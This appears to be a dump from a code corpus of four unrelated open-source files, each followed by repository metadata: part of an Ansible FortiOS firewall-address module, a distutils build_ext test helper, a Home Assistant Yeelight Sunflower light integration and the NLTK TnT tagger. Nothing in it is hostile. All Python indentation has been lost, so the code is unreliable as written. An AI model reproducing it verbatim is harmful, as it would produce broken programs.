- First IP address (inclusive) in the range for the address.
subnet:
description:
- IP address and subnet mask of address.
subnet-name:
description:
- Subnet name.
tagging:
description:
- Config object tagging.
suboptions:
category:
description:
- Tag category. Source system.object-tagging.category.
name:
description:
- Tagging entry name.
required: true
tags:
description:
- Tags.
suboptions:
name:
description:
- Tag name. Source system.object-tagging.tags.name.
required: true
tenant:
description:
- Tenant.
type:
description:
- Type of address.
choices:
- ipmask
- iprange
- fqdn
- geography
- wildcard
- wildcard-fqdn
- dynamic
uuid:
description:
- Universally Unique Identifier (UUID; automatically assigned but can be manually reset).
visibility:
description:
- Enable/disable address visibility in the GUI.
choices:
- enable
- disable
wildcard:
description:
- IP address and wildcard netmask.
wildcard-fqdn:
description:
- Fully Qualified Domain Name with wildcard characters.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure IPv4 addresses.
fortios_firewall_address:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
firewall_address:
state: "present"
allow-routing: "enable"
associated-interface: "<your_own_value> (source system.interface.name system.zone.name)"
cache-ttl: "5"
color: "6"
comment: "Comment."
country: "<your_own_value>"
end-ip: "<your_own_value>"
epg-name: "<your_own_value>"
filter: "<your_own_value>"
fqdn: "<your_own_value>"
list:
-
ip: "<your_own_value>"
name: "default_name_15"
obj-id: "<your_own_value>"
organization: "<your_own_value>"
policy-group: "<your_own_value>"
sdn: "aci"
sdn-tag: "<your_own_value>"
start-ip: "<your_own_value>"
subnet: "<your_own_value>"
subnet-name: "<your_own_value>"
tagging:
-
category: "<your_own_value> (source system.object-tagging.category)"
name: "default_name_26"
tags:
-
name: "default_name_28 (source system.object-tagging.tags.name)"
tenant: "<your_own_value>"
type: "ipmask"
uuid: "<your_own_value>"
visibility: "enable"
wildcard: "<your_own_value>"
wildcard-fqdn: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "key1"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_firewall_address_data(json):
option_list = ['allow-routing', 'associated-interface', 'cache-ttl',
'color', 'comment', 'country',
'end-ip', 'epg-name', 'filter',
'fqdn', 'list', 'name',
'obj-id', 'organization', 'policy-group',
'sdn', 'sdn-tag', 'start-ip',
'subnet', 'subnet-name', 'tagging',
'tenant', 'type', 'uuid',
'visibility', 'wildcard', 'wildcard-fqdn']
dictionary = {}
for attribute in option_list:
if attribute in json:
dictionary[attribute] = json[attribute]
return dictionary
def firewall_address(data, fos):
vdom = data['vdom']
firewall_address_data = data['firewall_address']
filtered_data = filter_firewall_address_data(firewall_address_data)
if firewall_address_data['state'] == "present":
return fos.set('firewall',
'address',
data=filtered_data,
vdom=vdom)
elif firewall_address_data['state'] == "absent":
return fos.delete('firewall',
'address',
mkey=filtered_data['name'],
vdom=vdom)
def fortios_firewall(data, fos):
login(data)
methodlist = ['firewall_address']
for method in methodlist:
if data[method]:
resp = eval(method)(data, fos)
break
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": "False"},
"firewall_address": {
"required": False, "type": "dict",
"options": {
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"allow-routing": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"associated-interface": {"required": False, "type": "str"},
"cache-ttl": {"required": False, "type": "int"},
"color": {"required": False, "type": "int"},
"comment": {"required": False, "type": "str"},
"country": {"required": False, "type": "str"},
"end-ip": {"required": False, "type": "str"},
"epg-name": {"required": False, "type": "str"},
"filter": {"required": False, "type": "str"},
"fqdn": {"required": False, "type": "str"},
"list": {"required": False, "type": "list",
"options": {
"ip": {"required": True, "type": "str"}
}},
"name": {"required": True, "type": "str"},
"obj-id": {"required": False, "type": "str"},
"organization": {"required": False, "type": "str"},
"policy-group": {"required": False, "type": "str"},
"sdn": {"required": False, "type": "str",
"choices": ["aci", "aws", "azure",
"gcp", "nsx", "nuage",
"oci"]},
"sdn-tag": {"required": False, "type": "str"},
"start-ip": {"required": False, "type": "str"},
"subnet": {"required": False, "type": "str"},
"subnet-name": {"required": False, "type": "str"},
"tagging": {"required": False, "type": "list",
"options": {
"category": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"tags": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}}
}},
"tenant": {"required": False, "type": "str"},
"type": {"required": False, "type": "str",
"choices": ["ipmask", "iprange", "fqdn",
"geography", "wildcard", "wildcard-fqdn",
"dynamic"]},
"uuid": {"required": False, "type": "str"},
"visibility": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"wildcard": {"required": False, "type": "str"},
"wildcard-fqdn": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
global fos
fos = FortiOSAPI()
is_error, has_changed, result = fortios_firewall(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | -6,537,436,329,098,680,000 | 32.821277 | 111 | 0.490627 | false |
flyher/pymo | android/pgs4a-0.9.6/python-install/lib/python2.7/distutils/tests/setuptools_build_ext.py | 149 | 11489 | from distutils.command.build_ext import build_ext as _du_build_ext
try:
# Attempt to use Pyrex for building extensions, if available
from Pyrex.Distutils.build_ext import build_ext as _build_ext
except ImportError:
_build_ext = _du_build_ext
import os, sys
from distutils.file_util import copy_file
from distutils.tests.setuptools_extension import Library
from distutils.ccompiler import new_compiler
from distutils.sysconfig import customize_compiler, get_config_var
get_config_var("LDSHARED") # make sure _config_vars is initialized
from distutils.sysconfig import _config_vars
from distutils import log
from distutils.errors import *
have_rtld = False
use_stubs = False
libtype = 'shared'
if sys.platform == "darwin":
use_stubs = True
elif os.name != 'nt':
try:
from dl import RTLD_NOW
have_rtld = True
use_stubs = True
except ImportError:
pass
def if_dl(s):
if have_rtld:
return s
return ''
class build_ext(_build_ext):
def run(self):
"""Build extensions in build directory, then copy if --inplace"""
old_inplace, self.inplace = self.inplace, 0
_build_ext.run(self)
self.inplace = old_inplace
if old_inplace:
self.copy_extensions_to_source()
def copy_extensions_to_source(self):
build_py = self.get_finalized_command('build_py')
for ext in self.extensions:
fullname = self.get_ext_fullname(ext.name)
filename = self.get_ext_filename(fullname)
modpath = fullname.split('.')
package = '.'.join(modpath[:-1])
package_dir = build_py.get_package_dir(package)
dest_filename = os.path.join(package_dir,os.path.basename(filename))
src_filename = os.path.join(self.build_lib,filename)
# Always copy, even if source is older than destination, to ensure
# that the right extensions for the current Python/platform are
# used.
copy_file(
src_filename, dest_filename, verbose=self.verbose,
dry_run=self.dry_run
)
if ext._needs_stub:
self.write_stub(package_dir or os.curdir, ext, True)
if _build_ext is not _du_build_ext and not hasattr(_build_ext,'pyrex_sources'):
# Workaround for problems using some Pyrex versions w/SWIG and/or 2.4
def swig_sources(self, sources, *otherargs):
# first do any Pyrex processing
sources = _build_ext.swig_sources(self, sources) or sources
# Then do any actual SWIG stuff on the remainder
return _du_build_ext.swig_sources(self, sources, *otherargs)
def get_ext_filename(self, fullname):
filename = _build_ext.get_ext_filename(self,fullname)
ext = self.ext_map[fullname]
if isinstance(ext,Library):
fn, ext = os.path.splitext(filename)
return self.shlib_compiler.library_filename(fn,libtype)
elif use_stubs and ext._links_to_dynamic:
d,fn = os.path.split(filename)
return os.path.join(d,'dl-'+fn)
else:
return filename
def initialize_options(self):
_build_ext.initialize_options(self)
self.shlib_compiler = None
self.shlibs = []
self.ext_map = {}
def finalize_options(self):
_build_ext.finalize_options(self)
self.extensions = self.extensions or []
self.check_extensions_list(self.extensions)
self.shlibs = [ext for ext in self.extensions
if isinstance(ext,Library)]
if self.shlibs:
self.setup_shlib_compiler()
for ext in self.extensions:
ext._full_name = self.get_ext_fullname(ext.name)
for ext in self.extensions:
fullname = ext._full_name
self.ext_map[fullname] = ext
ltd = ext._links_to_dynamic = \
self.shlibs and self.links_to_dynamic(ext) or False
ext._needs_stub = ltd and use_stubs and not isinstance(ext,Library)
filename = ext._file_name = self.get_ext_filename(fullname)
libdir = os.path.dirname(os.path.join(self.build_lib,filename))
if ltd and libdir not in ext.library_dirs:
ext.library_dirs.append(libdir)
if ltd and use_stubs and os.curdir not in ext.runtime_library_dirs:
ext.runtime_library_dirs.append(os.curdir)
def setup_shlib_compiler(self):
compiler = self.shlib_compiler = new_compiler(
compiler=self.compiler, dry_run=self.dry_run, force=self.force
)
if sys.platform == "darwin":
tmp = _config_vars.copy()
try:
# XXX Help! I don't have any idea whether these are right...
_config_vars['LDSHARED'] = "gcc -Wl,-x -dynamiclib -undefined dynamic_lookup"
_config_vars['CCSHARED'] = " -dynamiclib"
_config_vars['SO'] = ".dylib"
customize_compiler(compiler)
finally:
_config_vars.clear()
_config_vars.update(tmp)
else:
customize_compiler(compiler)
if self.include_dirs is not None:
compiler.set_include_dirs(self.include_dirs)
if self.define is not None:
# 'define' option is a list of (name,value) tuples
for (name,value) in self.define:
compiler.define_macro(name, value)
if self.undef is not None:
for macro in self.undef:
compiler.undefine_macro(macro)
if self.libraries is not None:
compiler.set_libraries(self.libraries)
if self.library_dirs is not None:
compiler.set_library_dirs(self.library_dirs)
if self.rpath is not None:
compiler.set_runtime_library_dirs(self.rpath)
if self.link_objects is not None:
compiler.set_link_objects(self.link_objects)
# hack so distutils' build_extension() builds a library instead
compiler.link_shared_object = link_shared_object.__get__(compiler)
def get_export_symbols(self, ext):
if isinstance(ext,Library):
return ext.export_symbols
return _build_ext.get_export_symbols(self,ext)
def build_extension(self, ext):
_compiler = self.compiler
try:
if isinstance(ext,Library):
self.compiler = self.shlib_compiler
_build_ext.build_extension(self,ext)
if ext._needs_stub:
self.write_stub(
self.get_finalized_command('build_py').build_lib, ext
)
finally:
self.compiler = _compiler
def links_to_dynamic(self, ext):
"""Return true if 'ext' links to a dynamic lib in the same package"""
# XXX this should check to ensure the lib is actually being built
# XXX as dynamic, and not just using a locally-found version or a
# XXX static-compiled version
libnames = dict.fromkeys([lib._full_name for lib in self.shlibs])
pkg = '.'.join(ext._full_name.split('.')[:-1]+[''])
for libname in ext.libraries:
if pkg+libname in libnames: return True
return False
def get_outputs(self):
outputs = _build_ext.get_outputs(self)
optimize = self.get_finalized_command('build_py').optimize
for ext in self.extensions:
if ext._needs_stub:
base = os.path.join(self.build_lib, *ext._full_name.split('.'))
outputs.append(base+'.py')
outputs.append(base+'.pyc')
if optimize:
outputs.append(base+'.pyo')
return outputs
def write_stub(self, output_dir, ext, compile=False):
log.info("writing stub loader for %s to %s",ext._full_name, output_dir)
stub_file = os.path.join(output_dir, *ext._full_name.split('.'))+'.py'
if compile and os.path.exists(stub_file):
raise DistutilsError(stub_file+" already exists! Please delete.")
if not self.dry_run:
f = open(stub_file,'w')
f.write('\n'.join([
"def __bootstrap__():",
" global __bootstrap__, __file__, __loader__",
" import sys, os, pkg_resources, imp"+if_dl(", dl"),
" __file__ = pkg_resources.resource_filename(__name__,%r)"
% os.path.basename(ext._file_name),
" del __bootstrap__",
" if '__loader__' in globals():",
" del __loader__",
if_dl(" old_flags = sys.getdlopenflags()"),
" old_dir = os.getcwd()",
" try:",
" os.chdir(os.path.dirname(__file__))",
if_dl(" sys.setdlopenflags(dl.RTLD_NOW)"),
" imp.load_dynamic(__name__,__file__)",
" finally:",
if_dl(" sys.setdlopenflags(old_flags)"),
" os.chdir(old_dir)",
"__bootstrap__()",
"" # terminal \n
]))
f.close()
if compile:
from distutils.util import byte_compile
byte_compile([stub_file], optimize=0,
force=True, dry_run=self.dry_run)
optimize = self.get_finalized_command('install_lib').optimize
if optimize > 0:
byte_compile([stub_file], optimize=optimize,
force=True, dry_run=self.dry_run)
if os.path.exists(stub_file) and not self.dry_run:
os.unlink(stub_file)
if use_stubs or os.name=='nt':
# Build shared libraries
#
def link_shared_object(self, objects, output_libname, output_dir=None,
libraries=None, library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None
): self.link(
self.SHARED_LIBRARY, objects, output_libname,
output_dir, libraries, library_dirs, runtime_library_dirs,
export_symbols, debug, extra_preargs, extra_postargs,
build_temp, target_lang
)
else:
# Build static libraries everywhere else
libtype = 'static'
def link_shared_object(self, objects, output_libname, output_dir=None,
libraries=None, library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None
):
# XXX we need to either disallow these attrs on Library instances,
# or warn/abort here if set, or something...
#libraries=None, library_dirs=None, runtime_library_dirs=None,
#export_symbols=None, extra_preargs=None, extra_postargs=None,
#build_temp=None
assert output_dir is None # distutils build_ext doesn't pass this
output_dir,filename = os.path.split(output_libname)
basename, ext = os.path.splitext(filename)
if self.library_filename("x").startswith('lib'):
# strip 'lib' prefix; this is kludgy if some platform uses
# a different prefix
basename = basename[3:]
self.create_static_lib(
objects, basename, output_dir, debug, target_lang
)
| mit | -3,508,374,496,247,061,500 | 39.031359 | 93 | 0.582731 | false |
w1ll1am23/home-assistant | homeassistant/components/yeelightsunflower/light.py | 21 | 3638 | """Support for Yeelight Sunflower color bulbs (not Yeelight Blue or WiFi)."""
import logging
import voluptuous as vol
import yeelightsunflower
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_HS_COLOR,
PLATFORM_SCHEMA,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
LightEntity,
)
from homeassistant.const import CONF_HOST
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
_LOGGER = logging.getLogger(__name__)
SUPPORT_YEELIGHT_SUNFLOWER = SUPPORT_BRIGHTNESS | SUPPORT_COLOR
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_HOST): cv.string})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Yeelight Sunflower Light platform."""
host = config.get(CONF_HOST)
hub = yeelightsunflower.Hub(host)
if not hub.available:
_LOGGER.error("Could not connect to Yeelight Sunflower hub")
return False
add_entities(SunflowerBulb(light) for light in hub.get_lights())
class SunflowerBulb(LightEntity):
"""Representation of a Yeelight Sunflower Light."""
def __init__(self, light):
"""Initialize a Yeelight Sunflower bulb."""
self._light = light
self._available = light.available
self._brightness = light.brightness
self._is_on = light.is_on
self._rgb_color = light.rgb_color
self._unique_id = light.zid
@property
def name(self):
"""Return the display name of this light."""
return f"sunflower_{self._light.zid}"
@property
def unique_id(self):
"""Return the unique ID of this light."""
return self._unique_id
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def is_on(self):
"""Return true if light is on."""
return self._is_on
@property
def brightness(self):
"""Return the brightness is 0-255; Yeelight's brightness is 0-100."""
return int(self._brightness / 100 * 255)
@property
def hs_color(self):
"""Return the color property."""
return color_util.color_RGB_to_hs(*self._rgb_color)
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_YEELIGHT_SUNFLOWER
def turn_on(self, **kwargs):
"""Instruct the light to turn on, optionally set colour/brightness."""
# when no arguments, just turn light on (full brightness)
if not kwargs:
self._light.turn_on()
else:
if ATTR_HS_COLOR in kwargs and ATTR_BRIGHTNESS in kwargs:
rgb = color_util.color_hs_to_RGB(*kwargs[ATTR_HS_COLOR])
bright = int(kwargs[ATTR_BRIGHTNESS] / 255 * 100)
self._light.set_all(rgb[0], rgb[1], rgb[2], bright)
elif ATTR_HS_COLOR in kwargs:
rgb = color_util.color_hs_to_RGB(*kwargs[ATTR_HS_COLOR])
self._light.set_rgb_color(rgb[0], rgb[1], rgb[2])
elif ATTR_BRIGHTNESS in kwargs:
bright = int(kwargs[ATTR_BRIGHTNESS] / 255 * 100)
self._light.set_brightness(bright)
def turn_off(self, **kwargs):
"""Instruct the light to turn off."""
self._light.turn_off()
def update(self):
"""Fetch new state data for this light and update local values."""
self._light.update()
self._available = self._light.available
self._brightness = self._light.brightness
self._is_on = self._light.is_on
self._rgb_color = self._light.rgb_color
| apache-2.0 | -1,719,767,012,948,952,000 | 31.482143 | 78 | 0.629192 | false |
syllog1sm/TextBlob | text/nltk/tag/tnt.py | 2 | 18395 | # Natural Language Toolkit: TnT Tagger
#
# Copyright (C) 2001-2013 NLTK Project
# Author: Sam Huston <[email protected]>
#
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
'''
Implementation of 'TnT - A Statisical Part of Speech Tagger'
by Thorsten Brants
http://acl.ldc.upenn.edu/A/A00/A00-1031.pdf
'''
from __future__ import print_function
from math import log
from operator import itemgetter
from nltk.probability import FreqDist, ConditionalFreqDist
from nltk.tag.api import TaggerI
class TnT(TaggerI):
'''
TnT - Statistical POS tagger
IMPORTANT NOTES:
* DOES NOT AUTOMATICALLY DEAL WITH UNSEEN WORDS
- It is possible to provide an untrained POS tagger to
create tags for unknown words, see __init__ function
* SHOULD BE USED WITH SENTENCE-DELIMITED INPUT
- Due to the nature of this tagger, it works best when
trained over sentence delimited input.
- However it still produces good results if the training
data and testing data are separated on all punctuation eg: [,.?!]
- Input for training is expected to be a list of sentences
where each sentence is a list of (word, tag) tuples
- Input for tag function is a single sentence
Input for tagdata function is a list of sentences
Output is of a similar form
* Function provided to process text that is unsegmented
- Please see basic_sent_chop()
TnT uses a second order Markov model to produce tags for
a sequence of input, specifically:
argmax [Proj(P(t_i|t_i-1,t_i-2)P(w_i|t_i))] P(t_T+1 | t_T)
IE: the maximum projection of a set of probabilities
The set of possible tags for a given word is derived
from the training data. It is the set of all tags
that exact word has been assigned.
To speed up and get more precision, we can use log addition
to instead multiplication, specifically:
argmax [Sigma(log(P(t_i|t_i-1,t_i-2))+log(P(w_i|t_i)))] +
log(P(t_T+1|t_T))
The probability of a tag for a given word is the linear
interpolation of 3 markov models; a zero-order, first-order,
and a second order model.
P(t_i| t_i-1, t_i-2) = l1*P(t_i) + l2*P(t_i| t_i-1) +
l3*P(t_i| t_i-1, t_i-2)
A beam search is used to limit the memory usage of the algorithm.
The degree of the beam can be changed using N in the initialization.
N represents the maximum number of possible solutions to maintain
while tagging.
It is possible to differentiate the tags which are assigned to
capitalized words. However this does not result in a significant
gain in the accuracy of the results.
'''
def __init__(self, unk=None, Trained=False, N=1000, C=False):
'''
Construct a TnT statistical tagger. Tagger must be trained
before being used to tag input.
:param unk: instance of a POS tagger, conforms to TaggerI
:type unk:(TaggerI)
:param Trained: Indication that the POS tagger is trained or not
:type Trained: boolean
:param N: Beam search degree (see above)
:type N:(int)
:param C: Capitalization flag
:type C: boolean
Initializer, creates frequency distributions to be used
for tagging
_lx values represent the portion of the tri/bi/uni taggers
to be used to calculate the probability
N value is the number of possible solutions to maintain
while tagging. A good value for this is 1000
C is a boolean value which specifies to use or
not use the Capitalization of the word as additional
information for tagging.
NOTE: using capitalization may not increase the accuracy
of the tagger
'''
self._uni = FreqDist()
self._bi = ConditionalFreqDist()
self._tri = ConditionalFreqDist()
self._wd = ConditionalFreqDist()
self._eos = ConditionalFreqDist()
self._l1 = 0.0
self._l2 = 0.0
self._l3 = 0.0
self._N = N
self._C = C
self._T = Trained
self._unk = unk
# statistical tools (ignore or delete me)
self.unknown = 0
self.known = 0
def train(self, data):
'''
Uses a set of tagged data to train the tagger.
If an unknown word tagger is specified,
it is trained on the same data.
:param data: List of lists of (word, tag) tuples
:type data: tuple(str)
'''
# Ensure that local C flag is initialized before use
C = False
if self._unk is not None and self._T == False:
self._unk.train(data)
for sent in data:
history = [('BOS',False), ('BOS',False)]
for w, t in sent:
# if capitalization is requested,
# and the word begins with a capital
# set local flag C to True
if self._C and w[0].isupper(): C=True
self._wd[w].inc(t)
self._uni.inc((t,C))
self._bi[history[1]].inc((t,C))
self._tri[tuple(history)].inc((t,C))
history.append((t,C))
history.pop(0)
# set local flag C to false for the next word
C = False
self._eos[t].inc('EOS')
# compute lambda values from the trained frequency distributions
self._compute_lambda()
#(debugging -- ignore or delete me)
#print "lambdas"
#print i, self._l1, i, self._l2, i, self._l3
def _compute_lambda(self):
'''
creates lambda values based upon training data
NOTE: no need to explicitly reference C,
it is contained within the tag variable :: tag == (tag,C)
for each tag trigram (t1, t2, t3)
depending on the maximum value of
- f(t1,t2,t3)-1 / f(t1,t2)-1
- f(t2,t3)-1 / f(t2)-1
- f(t3)-1 / N-1
increment l3,l2, or l1 by f(t1,t2,t3)
ISSUES -- Resolutions:
if 2 values are equal, increment both lambda values
by (f(t1,t2,t3) / 2)
'''
# temporary lambda variables
tl1 = 0.0
tl2 = 0.0
tl3 = 0.0
# for each t1,t2 in system
for history in self._tri.conditions():
(h1, h2) = history
# for each t3 given t1,t2 in system
# (NOTE: tag actually represents (tag,C))
# However no effect within this function
for tag in self._tri[history].samples():
# if there has only been 1 occurrence of this tag in the data
# then ignore this trigram.
if self._uni[tag] == 1:
continue
# safe_div provides a safe floating point division
# it returns -1 if the denominator is 0
c3 = self._safe_div((self._tri[history][tag]-1), (self._tri[history].N()-1))
c2 = self._safe_div((self._bi[h2][tag]-1), (self._bi[h2].N()-1))
c1 = self._safe_div((self._uni[tag]-1), (self._uni.N()-1))
# if c1 is the maximum value:
if (c1 > c3) and (c1 > c2):
tl1 += self._tri[history][tag]
# if c2 is the maximum value
elif (c2 > c3) and (c2 > c1):
tl2 += self._tri[history][tag]
# if c3 is the maximum value
elif (c3 > c2) and (c3 > c1):
tl3 += self._tri[history][tag]
# if c3, and c2 are equal and larger than c1
elif (c3 == c2) and (c3 > c1):
tl2 += float(self._tri[history][tag]) /2.0
tl3 += float(self._tri[history][tag]) /2.0
# if c1, and c2 are equal and larger than c3
# this might be a dumb thing to do....(not sure yet)
elif (c2 == c1) and (c1 > c3):
tl1 += float(self._tri[history][tag]) /2.0
tl2 += float(self._tri[history][tag]) /2.0
# otherwise there might be a problem
# eg: all values = 0
else:
#print "Problem", c1, c2 ,c3
pass
# Lambda normalisation:
# ensures that l1+l2+l3 = 1
self._l1 = tl1 / (tl1+tl2+tl3)
self._l2 = tl2 / (tl1+tl2+tl3)
self._l3 = tl3 / (tl1+tl2+tl3)
def _safe_div(self, v1, v2):
'''
Safe floating point division function, does not allow division by 0
returns -1 if the denominator is 0
'''
if v2 == 0:
return -1
else:
return float(v1) / float(v2)
def tagdata(self, data):
'''
Tags each sentence in a list of sentences
:param data:list of list of words
:type data: [[string,],]
:return: list of list of (word, tag) tuples
Invokes tag(sent) function for each sentence
compiles the results into a list of tagged sentences
each tagged sentence is a list of (word, tag) tuples
'''
res = []
for sent in data:
res1 = self.tag(sent)
res.append(res1)
return res
def tag(self, data):
'''
Tags a single sentence
:param data: list of words
:type data: [string,]
:return: [(word, tag),]
Calls recursive function '_tagword'
to produce a list of tags
Associates the sequence of returned tags
with the correct words in the input sequence
returns a list of (word, tag) tuples
'''
current_state = [(['BOS', 'BOS'], 0.0)]
sent = list(data)
tags = self._tagword(sent, current_state)
res = []
for i in range(len(sent)):
# unpack and discard the C flags
(t,C) = tags[i+2]
res.append((sent[i], t))
return res
def _tagword(self, sent, current_states):
'''
:param sent : List of words remaining in the sentence
:type sent : [word,]
:param current_states : List of possible tag combinations for
the sentence so far, and the log probability
associated with each tag combination
:type current_states : [([tag, ], logprob), ]
Tags the first word in the sentence and
recursively tags the reminder of sentence
Uses formula specified above to calculate the probability
of a particular tag
'''
# if this word marks the end of the sentance,
# return the most probable tag
if sent == []:
(h, logp) = current_states[0]
return h
# otherwise there are more words to be tagged
word = sent[0]
sent = sent[1:]
new_states = []
# if the Capitalisation is requested,
# initalise the flag for this word
C = False
if self._C and word[0].isupper(): C=True
# if word is known
# compute the set of possible tags
# and their associated log probabilities
if word in self._wd.conditions():
self.known += 1
for (history, curr_sent_logprob) in current_states:
logprobs = []
for t in self._wd[word].samples():
p_uni = self._uni.freq((t,C))
p_bi = self._bi[history[-1]].freq((t,C))
p_tri = self._tri[tuple(history[-2:])].freq((t,C))
p_wd = float(self._wd[word][t])/float(self._uni[(t,C)])
p = self._l1 *p_uni + self._l2 *p_bi + self._l3 *p_tri
p2 = log(p, 2) + log(p_wd, 2)
logprobs.append(((t,C), p2))
# compute the result of appending each tag to this history
for (tag, logprob) in logprobs:
new_states.append((history + [tag],
curr_sent_logprob + logprob))
# otherwise a new word, set of possible tags is unknown
else:
self.unknown += 1
# since a set of possible tags,
# and the probability of each specific tag
# can not be returned from most classifiers:
# specify that any unknown words are tagged with certainty
p = 1
# if no unknown word tagger has been specified
# then use the tag 'Unk'
if self._unk is None:
tag = ('Unk',C)
# otherwise apply the unknown word tagger
else :
[(_w, t)] = list(self._unk.tag([word]))
tag = (t,C)
for (history, logprob) in current_states:
history.append(tag)
new_states = current_states
# now have computed a set of possible new_states
# sort states by log prob
# set is now ordered greatest to least log probability
new_states.sort(reverse=True, key=itemgetter(1))
# del everything after N (threshold)
# this is the beam search cut
if len(new_states) > self._N:
new_states = new_states[:self._N]
# compute the tags for the rest of the sentence
# return the best list of tags for the sentence
return self._tagword(sent, new_states)
########################################
# helper function -- basic sentence tokenizer
########################################
def basic_sent_chop(data, raw=True):
'''
Basic method for tokenizing input into sentences
for this tagger:
:param data: list of tokens (words or (word, tag) tuples)
:type data: str or tuple(str, str)
:param raw: boolean flag marking the input data
as a list of words or a list of tagged words
:type raw: bool
:return: list of sentences
sentences are a list of tokens
tokens are the same as the input
Function takes a list of tokens and separates the tokens into lists
where each list represents a sentence fragment
This function can separate both tagged and raw sequences into
basic sentences.
Sentence markers are the set of [,.!?]
This is a simple method which enhances the performance of the TnT
tagger. Better sentence tokenization will further enhance the results.
'''
new_data = []
curr_sent = []
sent_mark = [',','.','?','!']
if raw:
for word in data:
if word in sent_mark:
curr_sent.append(word)
new_data.append(curr_sent)
curr_sent = []
else:
curr_sent.append(word)
else:
for (word,tag) in data:
if word in sent_mark:
curr_sent.append((word,tag))
new_data.append(curr_sent)
curr_sent = []
else:
curr_sent.append((word,tag))
return new_data
def demo():
from nltk.corpus import brown
sents = list(brown.tagged_sents())
test = list(brown.sents())
# create and train the tagger
tagger = TnT()
tagger.train(sents[200:1000])
# tag some data
tagged_data = tagger.tagdata(test[100:120])
# print results
for j in range(len(tagged_data)):
s = tagged_data[j]
t = sents[j+100]
for i in range(len(s)):
print(s[i],'--', t[i])
print()
def demo2():
from nltk.corpus import treebank
d = list(treebank.tagged_sents())
t = TnT(N=1000, C=False)
s = TnT(N=1000, C=True)
t.train(d[(11)*100:])
s.train(d[(11)*100:])
for i in range(10):
tacc = t.evaluate(d[i*100:((i+1)*100)])
tp_un = float(t.unknown) / float(t.known +t.unknown)
tp_kn = float(t.known) / float(t.known + t.unknown)
t.unknown = 0
t.known = 0
print('Capitalization off:')
print('Accuracy:', tacc)
print('Percentage known:', tp_kn)
print('Percentage unknown:', tp_un)
print('Accuracy over known words:', (tacc / tp_kn))
sacc = s.evaluate(d[i*100:((i+1)*100)])
sp_un = float(s.unknown) / float(s.known +s.unknown)
sp_kn = float(s.known) / float(s.known + s.unknown)
s.unknown = 0
s.known = 0
print('Capitalization on:')
print('Accuracy:', sacc)
print('Percentage known:', sp_kn)
print('Percentage unknown:', sp_un)
print('Accuracy over known words:', (sacc / sp_kn))
def demo3():
from nltk.corpus import treebank, brown
d = list(treebank.tagged_sents())
e = list(brown.tagged_sents())
d = d[:1000]
e = e[:1000]
d10 = int(len(d)*0.1)
e10 = int(len(e)*0.1)
tknacc = 0
sknacc = 0
tallacc = 0
sallacc = 0
tknown = 0
sknown = 0
for i in range(10):
t = TnT(N=1000, C=False)
s = TnT(N=1000, C=False)
dtest = d[(i*d10):((i+1)*d10)]
etest = e[(i*e10):((i+1)*e10)]
dtrain = d[:(i*d10)] + d[((i+1)*d10):]
etrain = e[:(i*e10)] + e[((i+1)*e10):]
t.train(dtrain)
s.train(etrain)
tacc = t.evaluate(dtest)
tp_un = float(t.unknown) / float(t.known +t.unknown)
tp_kn = float(t.known) / float(t.known + t.unknown)
tknown += tp_kn
t.unknown = 0
t.known = 0
sacc = s.evaluate(etest)
sp_un = float(s.unknown) / float(s.known + s.unknown)
sp_kn = float(s.known) / float(s.known + s.unknown)
sknown += sp_kn
s.unknown = 0
s.known = 0
tknacc += (tacc / tp_kn)
sknacc += (sacc / tp_kn)
tallacc += tacc
sallacc += sacc
#print i+1, (tacc / tp_kn), i+1, (sacc / tp_kn), i+1, tacc, i+1, sacc
print("brown: acc over words known:", 10 * tknacc)
print(" : overall accuracy:", 10 * tallacc)
print(" : words known:", 10 * tknown)
print("treebank: acc over words known:", 10 * sknacc)
